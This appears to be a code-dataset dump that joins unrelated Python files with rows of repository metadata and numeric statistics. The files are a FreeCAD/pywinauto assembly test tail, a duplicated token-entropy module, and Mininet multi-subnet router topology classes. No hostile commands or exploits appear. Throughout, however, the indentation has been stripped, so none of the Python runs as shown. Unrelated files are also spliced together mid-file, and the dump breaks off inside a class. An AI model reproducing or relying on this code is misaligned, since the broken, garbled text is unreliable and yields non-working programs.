FreeCADGui.getDocument("assembly").getObject("part_capacitor_plate").ShapeColor = (0.00,0.50,0.50)
# For placing the part_rondelle_m10_17d
for i in range(22, 28):
Mesh.insert(u"part_rondelle_m10_17d.stl", "assembly")
for i in range(19, 25):
alpha=(i*60*math.pi)/180
radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
vector = App.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 10)
FreeCAD.getDocument("assembly").getObject("part_rondelle_m10_17d0" + str(i)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
FreeCADGui.getDocument("assembly").getObject("part_rondelle_m10_17d0" + str(i)).ShapeColor = (1.00,1.00,0.00)
# insertion part_capacitor_plate - 1
vector = App.Vector(0, 0, 11)
Mesh.insert(u"part_capacitor_plate.stl", "assembly")
FreeCAD.getDocument("assembly").getObject("part_capacitor_plate001").Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 60))
FreeCADGui.getDocument("assembly").getObject("part_capacitor_plate001").ShapeColor = (0.00,0.50,0.50)
# For placing all the part_capacitor_plate
for i in range(2, 10):
if i % 2 == 0:
vector = App.Vector(0, 0, i*2 + 9)
Mesh.insert(u"part_capacitor_plate.stl", "assembly")
FreeCAD.getDocument("assembly").getObject("part_capacitor_plate00" + str(i)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
FreeCADGui.getDocument("assembly").getObject("part_capacitor_plate00" + str(i)).ShapeColor = (0.00,0.50,0.50)
else:
vector = App.Vector(0, 0, i*2 + 9)
Mesh.insert(u"part_capacitor_plate.stl", "assembly")
FreeCAD.getDocument("assembly").getObject("part_capacitor_plate00" + str(i)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 60))
FreeCADGui.getDocument("assembly").getObject("part_capacitor_plate00" + str(i)).ShapeColor = (0.00,0.50,0.50)
# For placing all the part_capacitor_plate
for i in range(10, 90):
if i % 2 == 0:
vector = App.Vector(0, 0, i*2 + 9)
Mesh.insert(u"part_capacitor_plate.stl", "assembly")
FreeCAD.getDocument("assembly").getObject("part_capacitor_plate0" + str(i)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
FreeCADGui.getDocument("assembly").getObject("part_capacitor_plate0" + str(i)).ShapeColor = (0.00,0.50,0.50)
else:
vector = App.Vector(0, 0, i*2 + 9)
Mesh.insert(u"part_capacitor_plate.stl", "assembly")
FreeCAD.getDocument("assembly").getObject("part_capacitor_plate0" + str(i)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 60))
FreeCADGui.getDocument("assembly").getObject("part_capacitor_plate0" + str(i)).ShapeColor = (0.00,0.50,0.50)
setview()
""")
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(460, 750))
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(70, 670))
time.sleep(3)
pywinauto.keyboard.send_keys(
'exec{(}open{(}"assembly.py"{)}.read{(}{)}{)}'
)
time.sleep(3)
pywinauto.keyboard.send_keys('{ENTER}')
if __name__ == '__main__':
unittest.main()
| 27.43207 | 155 | 0.676207 | 5,054 | 34,729 | 4.448753 | 0.040958 | 0.037627 | 0.019569 | 0.037182 | 0.954012 | 0.92746 | 0.896549 | 0.865994 | 0.857321 | 0.852784 | 0 | 0.060409 | 0.188258 | 34,729 | 1,265 | 156 | 27.453755 | 0.73715 | 0.013274 | 0 | 0.756243 | 0 | 0.084423 | 0.812175 | 0.406321 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01308 | false | 0 | 0.019025 | 0 | 0.033294 | 0.026159 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
7daf156b7213e83b377b3611d59eb8b6280e3642 | 11,564 | py | Python | ds4se/exp/info-[inspect].py | LeyliG/ds4se | ed8191cfb62c53a0ea9626a54f54f23bd31c3e59 | [
"Apache-2.0"
] | 1 | 2021-01-21T04:24:03.000Z | 2021-01-21T04:24:03.000Z | ds4se/exp/info-[inspect].py | LeyliG/ds4se | ed8191cfb62c53a0ea9626a54f54f23bd31c3e59 | [
"Apache-2.0"
] | null | null | null | ds4se/exp/info-[inspect].py | LeyliG/ds4se | ed8191cfb62c53a0ea9626a54f54f23bd31c3e59 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: nbs/1.1_exp.info-[inspect].ipynb (unless otherwise specified).
__all__ = ['logger', 'get_cnts', 'encode_text', 'get_freqs', 'get_dist', 'get_entropies_from_docs',
'get_entropy_from_docs', 'get_doc_entropies_from_df', 'get_corpus_entropies_from_df',
'get_system_entropy_from_df', 'shared_cnts_from_docs', 'shared_entropy_from_docs', 'shared_entropy_from_df',
'info_content', 'get_shared_probs_from_docs', 'logger', 'get_cnts', 'encode_text', 'get_freqs', 'get_dist',
'get_entropies_from_docs', 'get_entropy_from_docs', 'get_doc_entropies_from_df',
'get_corpus_entropies_from_df', 'get_system_entropy_from_df', 'shared_cnts_from_docs',
'shared_entropy_from_docs', 'shared_entropy_from_df', 'info_content', 'get_shared_probs_from_docs']
# Cell
# Imports
import dit
import math
import os
import logging
import matplotlib.pyplot as plt
import pandas as pd
import sentencepiece as sp
from collections import Counter
from pathlib import Path
from scipy.stats import sem, t
from statistics import mean, median, stdev
from tqdm.notebook import tqdm
import functools
# Cell
logger = logging.getLogger(__name__)
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO,
)
# Cell
def get_cnts(toks, vocab):
'''@danaderp
Counts tokens within ONE document'''
#logging.info("encoding_size:" len
cnt = Counter(vocab)
for tok in toks:
cnt[tok] += 1
return cnt
# Cell
def encode_text(text, model_prefix):
'''@danaderp
Encodes text using a pre-trained sp model, returns the occurrences of each token in the text'''
sp_processor = sp.SentencePieceProcessor()
sp_processor.Load(f"{model_prefix}.model")
encoding = sp_processor.encode_as_pieces(text)
vocab = {sp_processor.id_to_piece(id): 0 for id in range(sp_processor.get_piece_size())}
token_counts = get_cnts(encoding, vocab)
return token_counts
# Cell
def get_freqs(dict_token_counts):
num_tokens = sum( dict_token_counts.values() ) #number of subwords inside the document
frequencies = [ (dict_token_counts[token])/num_tokens for token in dict_token_counts ]
return frequencies
# Cell
def get_dist(token_counts):
'''@danaderp
Takes in a counter object of token occurrences, computes the entropy of the corpus that produced it'''
alphabet = list(set(token_counts.keys()))
frequencies = get_freqs(token_counts)
# for token in token_counts:s
# frequencies.append((token_counts[token])/num_tokens)
# logging.info(f'alphabet size {len(alphabet)}, freq size {len(frequencies)} alphabet - {list(token_counts.keys())}')
return dit.ScalarDistribution(alphabet, frequencies)
# Cell
def get_entropies_from_docs(docs, vocab):
entropies = []
for doc in tqdm(docs):
token_counts = get_cnts(doc, vocab)
entropies.append(dit.shannon.entropy(get_dist(token_counts)))
return entropies
# Cell
def get_entropy_from_docs(docs, vocab):
entropies = []
token_counts = Counter(vocab)
for doc in tqdm(docs):
token_counts += get_cnts(doc, vocab)
return dit.shannon.entropy(get_dist(token_counts))
# Cell
def get_doc_entropies_from_df(df, col, model_path, data_types):
'''Returns a list of the entropies of each entry in a dataframe column'''
all_entropies = []
for data_type in data_types:
corpus = df.loc[df['data_type'] == data_type]
entropies = []
for data in corpus[col]:
token_counts= encode_text(data, model_path)
entropies.append(dit.shannon.entropy(get_dist(token_counts)))
all_entropies.append(entropies)
return all_entropies
# Cell
def get_corpus_entropies_from_df(df, col, model_path, data_types):
entropies = []
for data_type in data_types:
corpus = df.loc[df['data_type'] == data_type]
token_counts = Counter()
for data in corpus[col]:
token_counts += encode_text(data, model_path)
entropies.append(dit.shannon.entropy(get_dist(token_counts)))
return entropies
# Cell
def get_system_entropy_from_df(df, col, model_path):
token_counts = Counter()
for data in df[col]:
token_counts += encode_text(data, model_path)
return dit.shannon.entropy(get_dist(token_counts))
# Cell
def shared_cnts_from_docs(sys_docs, vocab):
cnts = []
for docs in sys_docs:
token_counts = Counter(vocab)
for doc in tqdm(docs):
token_counts += get_cnts(doc, vocab)
cnts.append(token_counts)
return cnts
# Cell
def shared_entropy_from_docs(sys_docs, vocab):
cnts = shared_cnts_from_docs(sys_docs, vocab)
overlap = set(cnts[0])
for i, cnt in enumerate(cnts[1:]):
overlap &= set(cnt)
overlap = Counter({k: sum(cnts, Counter(vocab)).get(k, 0) for k in list(overlap)})
return dit.shannon.entropy(get_dist(overlap))
# Cell
def shared_entropy_from_df(df, col, model_path, data_types):
cnts = []
for data_type in data_types:
corpus = df.loc[df['data_type'] == data_type]
token_counts = Counter()
for data in corpus[col]:
token_counts += encode_text(data, model_path)
cnts.append(token_counts)
overlap = set(cnts[0])
for i, cnt in enumerate(cnts[1:]):
overlap &= set(cnt)
overlap = Counter({k: sum(cnts, Counter()).get(k, 0) for k in list(overlap)})
return dit.shannon.entropy(get_dist(overlap))
# Cell
def info_content(freqs):
tot = 0
for freq in freqs:
tot += math.log(1 / freq, 2)
return tot
# Cell
def get_shared_probs_from_docs(sys_docs, vocab):
cnts = shared_cnts_from_docs(sys_docs, vocab)
overlap = set(cnts[0])
for i, cnt in enumerate(cnts[1:]):
overlap &= set(cnt)
all_cnts = sum(cnts, Counter())
freqs = []
for tok, freq in zip(all_cnts, get_freqs(all_cnts)):
if tok in overlap:
freqs.append(freq)
return sum(freqs), info_content(freqs) / len(freqs) if len(freqs) != 0 else 0
# Cell
# Imports
import dit
import math
import os
import logging
import matplotlib.pyplot as plt
import pandas as pd
import sentencepiece as sp
from collections import Counter
from pathlib import Path
from scipy.stats import sem, t
from statistics import mean, median, stdev
from tqdm.notebook import tqdm
import functools
# Cell
from pandas.plotting import lag_plot
from pandas.plotting import scatter_matrix
# Cell
logger = logging.getLogger(__name__)
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO,
)
# Cell
def get_cnts(toks, vocab):
'''@danaderp
Counts tokens within ONE document'''
#logging.info("encoding_size:" len
cnt = Counter(vocab)
for tok in toks:
cnt[tok] += 1
return cnt
# Cell
def encode_text(text, model_prefix):
'''@danaderp
Encodes text using a pre-trained sp model, returns the occurrences of each token in the text'''
sp_processor = sp.SentencePieceProcessor()
sp_processor.Load(f"{model_prefix}.model")
encoding = sp_processor.encode_as_pieces(text)
vocab = {sp_processor.id_to_piece(id): 0 for id in range(sp_processor.get_piece_size())}
token_counts = get_cnts(encoding, vocab)
return token_counts
# Cell
def get_freqs(dict_token_counts):
num_tokens = sum( dict_token_counts.values() ) #number of subwords inside the document
frequencies = [ (dict_token_counts[token])/num_tokens for token in dict_token_counts ]
return frequencies
# Cell
def get_dist(token_counts):
'''@danaderp
Takes in a counter object of token occurrences, computes the entropy of the corpus that produced it'''
alphabet = list(set(token_counts.keys()))
frequencies = get_freqs(token_counts)
# for token in token_counts:s
# frequencies.append((token_counts[token])/num_tokens)
# logging.info(f'alphabet size {len(alphabet)}, freq size {len(frequencies)} alphabet - {list(token_counts.keys())}')
return dit.ScalarDistribution(alphabet, frequencies)
# Cell
def get_entropies_from_docs(docs, vocab):
entropies = []
for doc in tqdm(docs):
token_counts = get_cnts(doc, vocab)
entropies.append(dit.shannon.entropy(get_dist(token_counts)))
return entropies
# Cell
def get_entropy_from_docs(docs, vocab):
entropies = []
token_counts = Counter(vocab)
for doc in tqdm(docs):
token_counts += get_cnts(doc, vocab)
return dit.shannon.entropy(get_dist(token_counts))
# Cell
def get_doc_entropies_from_df(df, col, model_path, data_types):
'''Returns a list of the entropies of each entry in a dataframe column'''
all_entropies = []
for data_type in data_types:
corpus = df.loc[df['data_type'] == data_type]
entropies = []
for data in corpus[col]:
token_counts= encode_text(data, model_path)
entropies.append(dit.shannon.entropy(get_dist(token_counts)))
all_entropies.append(entropies)
return all_entropies
# Cell
def get_corpus_entropies_from_df(df, col, model_path, data_types):
entropies = []
for data_type in data_types:
corpus = df.loc[df['data_type'] == data_type]
token_counts = Counter()
for data in corpus[col]:
token_counts += encode_text(data, model_path)
entropies.append(dit.shannon.entropy(get_dist(token_counts)))
return entropies
# Cell
def get_system_entropy_from_df(df, col, model_path):
token_counts = Counter()
for data in df[col]:
token_counts += encode_text(data, model_path)
return dit.shannon.entropy(get_dist(token_counts))
# Cell
def shared_cnts_from_docs(sys_docs, vocab):
cnts = []
for docs in sys_docs:
token_counts = Counter(vocab)
for doc in tqdm(docs):
token_counts += get_cnts(doc, vocab)
cnts.append(token_counts)
return cnts
# Cell
def shared_entropy_from_docs(sys_docs, vocab):
cnts = shared_cnts_from_docs(sys_docs, vocab)
overlap = set(cnts[0])
for i, cnt in enumerate(cnts[1:]):
overlap &= set(cnt)
overlap = Counter({k: sum(cnts, Counter(vocab)).get(k, 0) for k in list(overlap)})
return dit.shannon.entropy(get_dist(overlap))
# Cell
def shared_entropy_from_df(df, col, model_path, data_types):
cnts = []
for data_type in data_types:
corpus = df.loc[df['data_type'] == data_type]
token_counts = Counter()
for data in corpus[col]:
token_counts += encode_text(data, model_path)
cnts.append(token_counts)
overlap = set(cnts[0])
for i, cnt in enumerate(cnts[1:]):
overlap &= set(cnt)
overlap = Counter({k: sum(cnts, Counter()).get(k, 0) for k in list(overlap)})
return dit.shannon.entropy(get_dist(overlap))
# Cell
def info_content(freqs):
tot = 0
for freq in freqs:
tot += math.log(1 / freq, 2)
return tot
# Cell
def get_shared_probs_from_docs(sys_docs, vocab):
cnts = shared_cnts_from_docs(sys_docs, vocab)
overlap = set(cnts[0])
for i, cnt in enumerate(cnts[1:]):
overlap &= set(cnt)
all_cnts = sum(cnts, Counter())
freqs = []
for tok, freq in zip(all_cnts, get_freqs(all_cnts)):
if tok in overlap:
freqs.append(freq)
return sum(freqs), info_content(freqs) / len(freqs) if len(freqs) != 0 else 0 | 30.837333 | 121 | 0.684192 | 1,651 | 11,564 | 4.561478 | 0.098728 | 0.090559 | 0.023901 | 0.03718 | 0.97995 | 0.97995 | 0.97995 | 0.97995 | 0.97995 | 0.97995 | 0 | 0.003485 | 0.205898 | 11,564 | 375 | 122 | 30.837333 | 0.816618 | 0.130059 | 0 | 0.955466 | 1 | 0 | 0.077982 | 0.043413 | 0 | 0 | 0 | 0 | 0 | 1 | 0.11336 | false | 0 | 0.11336 | 0 | 0.340081 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7ddb9e7b6f7c5afe006334e4db9571b3c5256717 | 76,670 | py | Python | Topology/build_topo_test1.py | Balzu/network-inference-with-Blockchain | 0ce67d44662771b3e575fdb1b3cebd5a233e6c6e | [
"MIT"
] | 1 | 2019-04-01T13:21:52.000Z | 2019-04-01T13:21:52.000Z | Topology/build_topo_test1.py | Balzu/network-inference-with-Blockchain | 0ce67d44662771b3e575fdb1b3cebd5a233e6c6e | [
"MIT"
] | null | null | null | Topology/build_topo_test1.py | Balzu/network-inference-with-Blockchain | 0ce67d44662771b3e575fdb1b3cebd5a233e6c6e | [
"MIT"
] | 1 | 2020-06-17T23:29:53.000Z | 2020-06-17T23:29:53.000Z | #!/us5/bin/python
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.node import Node
from mininet.log import setLogLevel, info
from mininet.cli import CLI
import pdb
class LinuxRouter( Node ):
"A Node with IP forwarding enabled."
def config( self, **params ):
super( LinuxRouter, self).config( **params )
# Enable forwarding on the router
self.cmd( 'sysctl net.ipv4.ip_forward=1' )
def terminate( self ):
self.cmd( 'sysctl net.ipv4.ip_forward=0' )
super( LinuxRouter, self ).terminate()
class NetworkTopo1( Topo ):
"""
This topology simulates a network with 6 hosts: 3 belongs to subnet 192.168.1.0/24 and the other three
belong to subnet 192.168.2.0/24. The two subnets are linked together with a router.
3 options are available:
one sensor in first subnet,
one sensor in second subnet,
one sensor in both subnets.
"""
def __init__(self, *args, **params):
'''
:param sensor1: True if a sensor has to be placed in subnet 192.168.1.0/24
:param sensor2: True if a sensor has to be placed in subnet 192.168.2.0/24
'''
self.sensor1 = False if (params['sensor1'] is None or params['sensor1'] is False) else True # Boolean
self.sensor2 = False if (params['sensor2'] is None or params['sensor2'] is False) else True # Boolean
self.swc = {} # Key: Number of switch, value: switch
self.net_hosts = []
self.active_sensors = []
self.passive_sensors = []
self.monitor_sensors = []
self.alias = {} # Dictionary st: key = router/host name, value = list of IP addresses of the router/host
self.sroutes = {} # Key: Router/Host/sensor id, value = list of static routes to be setup
super(NetworkTopo1, self).__init__()
def build( self, **_opts ):
self.router = self.addNode( 'r1', cls=LinuxRouter, ip='192.168.1.1/24' ) #'14.21.5.38/8'
self.alias['r1'] = []
self.sroutes['r1'] = []
for i in range(1, 3): # 2 subnets
self.swc[i] = self.addSwitch('s'+str(i))
hid1 = 'h'+str((i-1)*3)
hid2 = 'h' + str((i-1)*3+1)
hid3 = 'h' + str((i-1)*3+2)
rIP = '192.168.' + str(i) + '.1'
hIP1 = '192.168.' + str(i) + '.2'
hIP2 = '192.168.' + str(i) + '.3'
hIP3 = '192.168.' + str(i) + '.4'
self.net_hosts.append(self.addHost(hid1, ip=hIP1 + '/24', defaultRoute=rIP))
self.net_hosts.append(self.addHost(hid2, ip=hIP2 + '/24', defaultRoute=rIP))
self.net_hosts.append(self.addHost(hid3, ip=hIP3 + '/24', defaultRoute=rIP))
self.addLink(self.swc[i], self.router, intfName2='r1-eth'+ str(i),
params2={'ip': rIP + '/24'})
self.addLink(hid1, self.swc[i])
self.addLink(hid2, self.swc[i])
self.addLink(hid3, self.swc[i])
self.alias[hid1] = [hIP1]
self.alias[hid2] = [hIP2]
self.alias[hid3] = [hIP3]
self.alias['r1'].append(rIP)
self.sroutes['r1'].append('ip route add ' + hIP1 + '/32 via ' + hIP1 + ' dev r1-eth'+ str(i))
self.sroutes['r1'].append('ip route add ' + hIP2 + '/32 via ' + hIP2 + ' dev r1-eth'+ str(i))
self.sroutes['r1'].append('ip route add ' + hIP3 + '/32 via ' + hIP3 + ' dev r1-eth'+ str(i))
self.sroutes[hid1] = ['ip route add default via ' + rIP + ' dev ' + hid1 + '-eth0']
self.sroutes[hid2] = ['ip route add default via ' + rIP + ' dev ' + hid2 + '-eth0']
self.sroutes[hid3] = ['ip route add default via ' + rIP + ' dev ' + hid3 + '-eth0']
# In Mininet you can't send simultaneously 2 commands to the same host. To circumvent this limitation
# we create 3 hosts for each sensor, connected to the same switch: the active host looks for dead nodes,
# The passive host looks for new nodes, the monitor host runs the topology inference algorithm
for i in range(1, 3):
if i == 1:
if self.sensor1 == True:
self.add_sensor(1)
elif i == 2:
if self.sensor2 == True:
self.add_sensor(2)
def add_sensor(self,i):
asid = 'has'+str(i)
psid = 'hps' + str(i)
msid = 'hms' + str(i)
rIP = '192.168.' + str(i) + '.1'
asIP = '192.168.' + str(i) + '.101' # Active sensor IP
psIP = '192.168.' + str(i) + '.102' # Passive sensor IP
msIP = '192.168.' + str(i) + '.103' # Monitor sensor IP (the one that runs iTop)
self.active_sensors.append(self.addHost(asid, ip=asIP + '/24', defaultRoute=rIP))
self.passive_sensors.append(self.addHost(psid, ip=psIP + '/24', defaultRoute=rIP))
self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/24', defaultRoute=rIP))
self.addLink(asid, self.swc[i])
self.addLink(psid, self.swc[i])
self.addLink(msid, self.swc[i])
# The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
self.alias[msid] = [asIP]
self.alias[msid].append(psIP)
self.alias[msid].append(msIP)
self.sroutes['r1'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r1-eth' + str(i))
self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
self.sroutes[psid] = ['ip route add default via ' + rIP + ' dev ' + psid + '-eth0']
self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']
def add_static_routes(self, net):
'''Add static routes to the router for subnets not directly visible'''
for k in self.sroutes.keys():
for r in self.sroutes[k]:
net[k].cmd(r)
def create_alias_file(self):
with open('alias', 'w') as f:
for k in self.alias.keys():
f.write(k + ' ')
for ip in self.alias[k]:
f.write(ip + ' ')
f.write('\n')
class NetworkTopo2( Topo ):
"""
This topology simulates a network with 20 hosts: ten belong to subnet 192.168.1.0/24 and the other ten
belong to subnet 192.168.2.0/24. The two subnets are linked together with a router.
3 options are available:
one sensor in first subnet,
one sensor in second subnet,
one sensor in both subnets.
"""
def __init__(self, *args, **params):
'''
:param sensor1: True if a sensor has to be placed in subnet 192.168.1.0/24
:param sensor2: True if a sensor has to be placed in subnet 192.168.2.0/24
'''
self.sensor1 = False if (params['sensor1'] is None or params['sensor1'] is False) else True # Boolean
self.sensor2 = False if (params['sensor2'] is None or params['sensor2'] is False) else True # Boolean
self.swc = {} # Key: Number of switch, value: switch
self.net_hosts = []
self.active_sensors = []
self.passive_sensors = []
self.monitor_sensors = []
self.alias = {} # Dictionary st: key = router/host name, value = list of IP addresses of the router/host
self.sroutes = {} # Key: Router/Host/sensor id, value = list of static routes to be setup
super(NetworkTopo2, self).__init__()
def build( self, **_opts ):
self.router = self.addNode( 'r1', cls=LinuxRouter, ip='192.168.1.1/24' ) #'14.21.5.38/8'
self.alias['r1'] = []
self.sroutes['r1'] = []
for i in range(1, 3): # 2 subnets
# Add the switch
self.swc[i] = self.addSwitch('s'+str(i))
# Add the router
rIP = '192.168.' + str(i) + '.1'
self.addLink(self.swc[i], self.router, intfName2='r1-eth' + str(i),
params2={'ip': rIP + '/24'})
self.alias['r1'].append(rIP)
# Add the hosts
for j in range(1,11):
hid = 'h'+str(((i-1)*10) + j-1) # Just to make hosts start from zero..
hIP = '192.168.' + str(i) + '.' + str(j+1)
self.net_hosts.append(self.addHost(hid, ip=hIP + '/24', defaultRoute=rIP))
self.addLink(hid, self.swc[i])
self.alias[hid] = [hIP]
self.sroutes['r1'].append('ip route add ' + hIP + '/32 via ' + hIP + ' dev r1-eth' + str(i))
self.sroutes[hid] = ['ip route add default via ' + rIP + ' dev ' + hid + '-eth0']
# In Mininet you can't send simultaneously 2 commands to the same host. To circumvent this limitation
# we create 3 hosts for each sensor, connected to the same switch: the active host looks for dead nodes,
# The passive host looks for new nodes, the monitor host runs the topology inference algorithm
if self.sensor1 == True:
self.add_sensor(1)
if self.sensor2 == True:
self.add_sensor(2)
def add_sensor(self,i):
asid = 'has'+str(i)
psid = 'hps' + str(i)
msid = 'hms' + str(i)
rIP = '192.168.' + str(i) + '.1'
asIP = '192.168.' + str(i) + '.101' # Active sensor IP
psIP = '192.168.' + str(i) + '.102' # Passive sensor IP
msIP = '192.168.' + str(i) + '.103' # Monitor sensor IP (the one that runs iTop)
self.active_sensors.append(self.addHost(asid, ip=asIP + '/24', defaultRoute=rIP))
self.passive_sensors.append(self.addHost(psid, ip=psIP + '/24', defaultRoute=rIP))
self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/24', defaultRoute=rIP))
self.addLink(asid, self.swc[i])
self.addLink(psid, self.swc[i])
self.addLink(msid, self.swc[i])
# The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
self.alias[msid] = [asIP]
self.alias[msid].append(psIP)
self.alias[msid].append(msIP)
self.sroutes['r1'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r1-eth' + str(i))
self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
self.sroutes[psid] = ['ip route add default via ' + rIP + ' dev ' + psid + '-eth0']
self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']
def add_static_routes(self, net):
'''Add static routes to the router for subnets not directly visible'''
for k in self.sroutes.keys():
for r in self.sroutes[k]:
net[k].cmd(r)
def create_alias_file(self):
with open('alias', 'w') as f:
for k in self.alias.keys():
f.write(k + ' ')
for ip in self.alias[k]:
f.write(ip + ' ')
f.write('\n')
class NetworkTopo3( Topo ):
"""
This topology simulates a network with 100 hosts: 50 belong to subnet 192.168.1.0/24 and the other 50
belong to subnet 192.168.2.0/24. The two subnets are linked together with a router.
3 options are available:
one sensor in first subnet,
one sensor in second subnet,
one sensor in both subnets.
"""
def __init__(self, *args, **params):
'''
:param sensor1: True if a sensor has to be placed in subnet 192.168.1.0/24
:param sensor2: True if a sensor has to be placed in subnet 192.168.2.0/24
'''
self.sensor1 = False if (params['sensor1'] is None or params['sensor1'] is False) else True # Boolean
self.sensor2 = False if (params['sensor2'] is None or params['sensor2'] is False) else True # Boolean
self.swc = {} # Key: Number of switch, value: switch
self.net_hosts = []
self.active_sensors = []
self.passive_sensors = []
self.monitor_sensors = []
self.alias = {} # Dictionary st: key = router/host name, value = list of IP addresses of the router/host
self.sroutes = {} # Key: Router/Host/sensor id, value = list of static routes to be setup
super(NetworkTopo3, self).__init__()
def build( self, **_opts ):
self.router = self.addNode( 'r1', cls=LinuxRouter, ip='192.168.1.1/24' ) #'14.21.5.38/8'
self.alias['r1'] = []
self.sroutes['r1'] = []
for i in range(1, 3): # 2 subnets
# Add the switch
self.swc[i] = self.addSwitch('s'+str(i))
# Add the router
rIP = '192.168.' + str(i) + '.1'
self.addLink(self.swc[i], self.router, intfName2='r1-eth' + str(i),
params2={'ip': rIP + '/24'})
self.alias['r1'].append(rIP)
# Add the hosts
for j in range(1,51):
hid = 'h'+str(((i-1)*50) + j-1) # Just to make hosts start from zero..
hIP = '192.168.' + str(i) + '.' + str(j+1)
self.net_hosts.append(self.addHost(hid, ip=hIP + '/24', defaultRoute=rIP))
self.addLink(hid, self.swc[i])
self.alias[hid] = [hIP]
self.sroutes['r1'].append('ip route add ' + hIP + '/32 via ' + hIP + ' dev r1-eth' + str(i))
self.sroutes[hid] = ['ip route add default via ' + rIP + ' dev ' + hid + '-eth0']
# In Mininet you can't send simultaneously 2 commands to the same host. To circumvent this limitation
# we create 3 hosts for each sensor, connected to the same switch: the active host looks for dead nodes,
# The passive host looks for new nodes, the monitor host runs the topology inference algorithm
if self.sensor1 == True:
self.add_sensor(1)
if self.sensor2 == True:
self.add_sensor(2)
def add_sensor(self,i):
asid = 'has'+str(i)
psid = 'hps' + str(i)
msid = 'hms' + str(i)
rIP = '192.168.' + str(i) + '.1'
asIP = '192.168.' + str(i) + '.101' # Active sensor IP
psIP = '192.168.' + str(i) + '.102' # Passive sensor IP
msIP = '192.168.' + str(i) + '.103' # Monitor sensor IP (the one that runs iTop)
self.active_sensors.append(self.addHost(asid, ip=asIP + '/24', defaultRoute=rIP))
self.passive_sensors.append(self.addHost(psid, ip=psIP + '/24', defaultRoute=rIP))
self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/24', defaultRoute=rIP))
self.addLink(asid, self.swc[i])
self.addLink(psid, self.swc[i])
self.addLink(msid, self.swc[i])
# The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
self.alias[msid] = [asIP]
self.alias[msid].append(psIP)
self.alias[msid].append(msIP)
self.sroutes['r1'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r1-eth' + str(i))
self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
self.sroutes[psid] = ['ip route add default via ' + rIP + ' dev ' + psid + '-eth0']
self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']
def add_static_routes(self, net):
'''Add static routes to the router for subnets not directly visible'''
for k in self.sroutes.keys():
for r in self.sroutes[k]:
net[k].cmd(r)
def create_alias_file(self):
with open('alias', 'w') as f:
for k in self.alias.keys():
f.write(k + ' ')
for ip in self.alias[k]:
f.write(ip + ' ')
f.write('\n')
class NetworkTopo4( Topo ):
"""
This topology simulates a network with three routers.
Two hosts belong to subnet 12.0.0.0/8, representing the internet.
Two hosts belong to subnet 192.168.1.0/24, representing the DMZ.
Two hosts belong to subnet 192.168.2.0/24, representing LAN 1.
Two hosts belong to subnet 192.168.3.0/24, representing LAN 2.
Communication possible among all subnets.
"""
def __init__(self, *args, **params):
'''
:param sensor1: True if a sensor has to be placed in subnet 12.0.0.0/8
:param sensor2: True if a sensor has to be placed in subnet 192.168.1.0/24
:param sensor2: True if a sensor has to be placed in subnet 192.168.2.0/24
:param sensor2: True if a sensor has to be placed in subnet 192.168.3.0/24
'''
self.sensor1 = False if (params['sensor1'] is None or params['sensor1'] is False) else True
self.sensor2 = False if (params['sensor2'] is None or params['sensor2'] is False) else True
self.sensor3 = False if (params['sensor3'] is None or params['sensor3'] is False) else True
self.sensor4 = False if (params['sensor4'] is None or params['sensor4'] is False) else True
self.swc = {} # Key: Number of switch, value: switch
self.net_hosts = []
self.active_sensors = []
self.passive_sensors = []
self.monitor_sensors = []
self.interface_name = []
self.alias = {} # Dictionary st: key = router/host name, value = list of IP addresses of the router/host
self.sroutes = {} # Key: Router/Host/sensor id, value = list of static routes to be setup
super(NetworkTopo4, self).__init__()
def build( self, **_opts ):
# Connect router r1 to Internet Hosts
r1IP1 = '12.10.5.1'
self.router1 = self.addNode( 'r1', cls=LinuxRouter, ip=r1IP1+'/8' )
self.alias['r1'] = []
self.alias['r1'].append(r1IP1)
self.sroutes['r1'] = []
self.swc[1] = self.addSwitch('s1')
self.addLink(self.swc[1], self.router1, intfName2='r1-eth1', params2={'ip': r1IP1+'/8'})
